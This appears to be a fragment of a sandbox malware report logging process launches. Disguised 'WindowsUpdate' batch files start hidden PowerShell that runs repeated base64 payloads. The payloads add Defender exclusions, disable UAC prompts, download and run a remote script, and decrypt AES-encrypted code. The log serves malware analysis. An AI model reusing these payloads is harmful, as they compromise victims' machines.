NWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVR